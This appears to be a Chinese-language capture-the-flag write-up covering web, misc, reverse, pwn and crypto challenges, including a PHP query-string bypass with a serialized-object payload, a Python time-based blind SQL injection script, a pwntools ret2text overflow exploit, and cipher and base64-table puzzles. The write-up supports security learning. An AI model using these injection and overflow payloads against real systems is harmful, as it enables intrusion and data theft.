web
phpplayer
Payload:/?a[]=1&b[]=2&c[]=3&d[1.01=4&fake_flag=flag&flag=1&obj=O:4:“test”:2:{s:1:“a”;s:3:“abc”;}
flag=1
1.弱类型比较漏洞 将a设置为一个数组 绕过第一个和第二个if
2.根据md5特性 数组无法比较md5值 将b c 都设置为数组可绕过md5验证
3.get post flag=flag 绕过这个一个if
4.需要让 d_1.01 变量存在才能绕过这个if 但是这个变量命名不符合规则 csdn搜索遇到类似的
将d设置为包含子数组的参数 可以使条件成立 构造 d[1.01=1] 绕过这个if
5.反序列化漏洞 构造obj参数 修改属性数 绕过这个if
obj=O:4:“test”:2:{s:1:“a”;s:3:“abc”;}
6.将fake_flag 全局变量设置 为 flag 读取flag内容
<?php
class test{
public $a='123';
}
$a = new test;
echo serialize($a);
?>
# O:4:"test":1:{s:1:"a";s:3:"123";}
O:4:"test":2:{s:1:"a";s:3:"123";}ilikesleep
import string
import httpx
import time
URL = "http://webt2.chall.ctf.l3hsec.com/index.php"
alis = [ord(i) for i in (string.ascii_letters + string.digits)]
rlis = [123,125,95,44] + alis
def test(payload:str)->bool:
test_data = {"id":payload}
try:
httpx.post(URL,data=test_data)
except httpx.ReadTimeout:
return True
return False
def attack(column_length:int):
flag = ""
for i in range(column_length):
for char in rlis:
payload = f"1'\tunion\tselect\tnull,null,if(substr((select\tgroup_concat(flag)\tfrom\tflag),{i},1)='{chr(char)}',benchmark(30000000,sha(1)),1)#"
if test(payload):
flag+=chr(char)
print(flag)
time.sleep(1)
break
return flag
print(attack(100))misc
base64?
我的密文: ox6qJI1Q7kJY1OvuR/1CBs1yRVvuEIfeR/lCUMAGrV8LwEL=
泄露的明文: jRQfVJMwco5wegcVY3cAFi5a7V97IIWMgNh/epeit8Prp1+vdved0CzndIyCqfEMvho3YF33SYjeif4oi0mGscBFhRH70i17E8IgGAVXtZGDhSK9vPkH5MhI
泄露的密文: N+d9r+rjVElQoG1krPlQ1+MG8LvXNV1p658u6L+d1L5aVsFKrEA+NEUhB/dYRTfIr/r+rxAx7suMTE+xJPrvVErqoG6r9QRGB5+0rP+s6XSWRX5/JI6m9spTTxJYNVnk9VpdrLlA1+pLPMlnNv6zbErUNLF5VPpd
你现在知道我的明文了吗?
wp: 根据题意 密文长度是明文长度的1.5倍可推测出是base64加密
但是常规的base64解密无法得出答案
根据泄露的明文和密文可以推测出 原来的base64码表被替换
所以需要根据明文和密文破解出 替换后的码表
由于写脚本水平太差 TmT 我半手动半脚本破解了码表:) 过程如下
根据base64的特性 把明文的ASCII值转为8位二进制
然后用python分为六个一组 计算出相应的数值 然后与字符 对应就得到了码表
不过不完整
然后替换码表进行base64解密
由于码表还不全 我写脚本的能力太差 然后我4个一组 暴力猜测手动试出了可读的字符 得到了flag TmT…
import base64
import string
str1 = "ox6q JI1Q 7kJY 1Ovu R/1C Bs1y RVvu EIfe R/lC UMAG rV8L wEL="
string1 = "yAmxnvX/wdjzR6b2U9TVB1PE8rNoJl7CFpOQM+saqW022feKY22GL5Ikhu222S22"
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
print (base64.b64decode(str1.translate(str.maketrans(string1,string2))))把未知的码表替换为2 然后暴力破解出可读的字符
最终结果: b’l3hsec{w0W!y0u_Re@11y_kn0w_B@se64!}’
我属于是编程水平太差,人肉爆破的,这里po一下南小鸟师傅的脚本
def diybase64_encode(source, cipher):
map = [' ' for i in range(64)]
binary_str = ''.join(format(ord(c), '08b') for c in source)
paddinglen = (-len(source)) % 3
tmp = binary_str + paddinglen * '00'
result = ''
for i in range(int(len(tmp) / 6)):
tmp1 = tmp[i * 6:(i + 1) * 6]
num = int(tmp1, 2)
map[num] = cipher[i]
return map
m = 'jRQfVJMwco5wegcVY3cAFi5a7V97IIWMgNh/epeit8Prp1+vdved0CzndIyCqfEMvho3YF33SYjeif4oi0mGscBFhRH70i17E8IgGAVXtZGDhSK9vPkH5MhI'
c = 'N+d9r+rjVElQoG1krPlQ1+MG8LvXNV1p658u6L+d1L5aVsFKrEA+NEUhB/dYRTfIr/r+rxAx7suMTE+xJPrvVErqoG6r9QRGB5+0rP+s6XSWRX5/JI6m9spTTxJYNVnk9VpdrLlA1+pLPMlnNv6zbErUNLF5VPpd'
map = diybase64_encode(m, c)
map.append('=')
print(map)得到新的base64表,注意到没有flag密文中的一些字符,爆破。
ci = 'ox6qJI1Q7kJY1OvuR/1CBs1yRVvuEIfeR/lCUMAGrV8LwEL='
'''for i in ci:
if i not in map:
print(i)'''
lostChar = 'OCyew'
lostPart = [0, 8, 15, 31, 34, 43, 44, 46, 49, 50, 58, 59, 60, 62, 63]
for i in list(itertools.product(lostPart, repeat=5)):
if len(i) != len(set(i)):
continue
tmpMap = list(map)
for j in range(len(lostChar)):
tmpMap[i[j]] = lostChar[j]
flag = diybase64_decode(ci, tmpMap)
if 'kn0w_B@se64!}' in flag and 'l3hsec{w0W!y0u' in flag:
print(flag)真的不用对脑洞
跨过这两道栅栏,培根转身看不到摩斯,只看到了一堆贝斯
8FUlS64u6kfnkWTRhWhdeWRds8DYw09nfHv07UBU73Up9AVuus1VIU0XBxaEUHooUMFGBkt4RfrMLeMbDCFhMakuFA1lzp0Sao8aUwZicJ8rLj6CDxYNBFUOQTuJ4EYmdTAAofTsBEYT3xvOKCbsRHJ2IP1nThBN9M4Q5glFsDSCx06CgzvkEy4RSdFRAWOrMVRcZTZMz4dl5gfJ6xUCAtLvW73nD5hnBogRc42jLpw7hFx9sUfFcAhGGXjEwGEOEJy8rs9MRkBgKQOy1YxJ74fnbAGSXTp4d99aLGSBDyxkLufiSdfWEdA3F62C9SN8qWuyvjo0O824RvlqISyhwOygq8QleUXdallrNYi4gXZBA0GZ1fhBuFF3PMuX1W7dKsh4nw65FUeuwcg67mVv1egoo67JdcNo3mLh3vzydJhyTXGcwwe4MnbQEYyg6NQKfFKUe8acJMUxpBUAtJebjomEaODkxDZzHPwSBKPyKwnCCAoaQEYnVZ0ePPDSpsm0DXb4WjyfXalsudNbS9ghrhnlofKe2tBK98qPSpm1haTA2Xrl7WOXTLD6mgf7Hz0GTzfKpY0P3r0W8VnjUi3Zz0qISytGey0yFA1Ic0dslEHz1QjbP91D9bYJYJlP0QdQB7q9zJ7Mx7b1qS3V4qKoXv8pZ72A1KKyACrjQ0OMxb7VXmwYP7taYpYsmgdArc20u6zvHyuqCZT9waCNQ3rc9KKvrO2mR5ZL2jvBeiVUWraM2seagF5rcQ956DyC3TArAyvQd5zpe3eV3tEGE000QsUOBIIaX4V2WTWp8o91JU9YTl8lJ9sohu5jvoaUnvsWFBsvf6fFk8odUCKCueTiVYf3wWqD66X2Li9MMRa0pXuWD8cyYKGdQFuVWdjXHSueYk1u8kEhUpeE9EH5CF5YSnAWgYxPZVDFRpMbHH4NvzR68BRCE53h2ZalKdmm7Vd4lUmUTsKQNTWIj2iGZcnk7nZf7igefun3lqMy7TNwhFMtwVMStMlEYND6DW8LFQNrX9RkJAvVXbBVhSiLZpXoGPaBlk856cXzx2c2CjnTwUCceQhsqRvVOhedvlWR7qUX7R3gjcSXBSUw6fJBskGwvgA0m3qfpCzfS7rBFN9Ayogcuqw7HPluhaGXqDGpH8s1nthQ67klVDJmlhPe19aCclFNN4tfyEpAeOOq09jGOSZjnVmUU3EIcxJcnD4fMNbYvXQ9893LpLZYoNEX4aG8pnDtSxHBDUwMRRXZ8FAAUThUiIOT933sy6rMCj1pLxZ5Q4qvN0b3aUzTvt0jOnqDypygaFK1dXOCEatTRrAW9ElJJkZYUv31m12iU06LhapQy9DCntDahiwQMtEkmBlNdjgNPuNeMD8miRQDcEnvjqM5CXhNiSZa1dvtG7DhyQ7lpbILclMyrP85Xh7Dny28eoEwMZGq3tG0sNOGKFm97tktMQdhLz6xvXN2Z1pBbIWOWPYu7X40VfBojUZclnkK7xaNTgCJ40gVp利用basecrack脚本多次base解码后得到这个
-./-./---/-./-./---/-./-./---/-./-./---/---/-./---/-./---/-./-./-./-./---/-./-./---/-./-./-./---/-./-./---/---/---/-./-./-./-./---/-./---/---/-./-./-./---/-./-./-./---/-./-./-./---/-./---/---/-./-./-./-./---/-./---/---/-./---/---/---/---/-./-./-./-./-./---/-./-./---/---/---/-./-./---/-./-./---/---/---/-.翻译莫斯电码
NNONNONNONNOONONONNNNONNONNNONNOOONNNNONOONNNONNNONNNONOONNNNONOONOOOONNNNNONNOOONNONNOOON5个一组
AABAA BAABA ABBAB ABAAA ABAAB AAABA ABBBA AAABA BBAAA BAAAB AAABA BBAAA ABABB ABBBB AAAAA BAABB BAABA ABBBA培根密码解码 E S N I J C O C Y R C Y L P A T S O E T O I K C P C S C M Q A U T P
根据跨过两道栅栏可以 将其分为两个一组
ES NI JC OC YR CY LP AT SO
每组先读取首字母得到 ENJOYCLASSICCRYPTO
chatsignin
奶奶的睡前flag故事
robot36
010editor打开,看到cover.png结尾有东西
查到wav文件头是RIFF,找到后删去前面的内容,另存为1.wav。然后用robot36处理。
re
pyencode
gpt秒了
def restore_string(ret):
s = ""
for i in range(0, len(ret), 3):
nums = ret[i:i+3]
num1_high = nums[0]<<3
num1_low = nums[1]>>3
num2_low = nums[2]
num2_high = (nums[1]&0b00000111)<<4
num2 = num2_high+num2_low
print(chr(num1_high+num1_low),end='')
print(chr(num2),end='')
return s
ret = [13, 35, 3, 13, 7, 3, 12, 46, 3, 15, 30, 1, 6, 19, 9, 6, 62, 6, 7, 3, 6, 12, 34, 13, 12, 51, 1, 12, 11, 6, 5, 43, 4, 12, 11, 3, 6, 50, 13, 7, 14, 6, 6, 6, 6, 5, 43, 3, 6, 43, 8, 6, 59, 3, 12, 35, 3, 12, 11, 1, 6, 46, 6, 6, 15, 13]
result = restore_string(ret)
print(result)pwn
ret2text
from pwn import *
context(log_level='debug',arch='amd64', os='linux')
p = remote('ctf.l3hsec.com',40008)
read_flag = 0x4007D8
ret = 0x40089d# 对齐
buf = b'1'*0x18
payload = buf +p64(ret)+p64(read_flag)
p.recv()
p.sendline(payload)
p.recv()
p.recv()CRYPTO
factor
from Crypto.Util.number import *
p = 11818626157955143367425397134539988701945901292912494601671841920448950142432716617641692683670072692623351876503702080986305564988430515942372445616530643
n = 155973472877500551696404049342507495077134952416313340244284845928778400385389548636037403472336378336490931666382159990607516752340206514340009510417187026921007116552045963973163720919596636575029141772459275706505175142195195686881713118383919643653234410908740422880120161538592336383479253864155940629093
q= n//p
assert p*q == n
e = 0x10001
d = inverse(e,(p-1)*(q-1))
c = 32349988441710439726991823014652327949110727303493414402820119679942533399117470462729126720315109509283386087378965374529410971247867614623318967344071216979994926505735379297102144644819487720051553195643392945426400493308569024431403247836671630208580022421678378308476007451938426212992790979191141986943
m = pow(c,d,n)
print(long_to_bytes(m))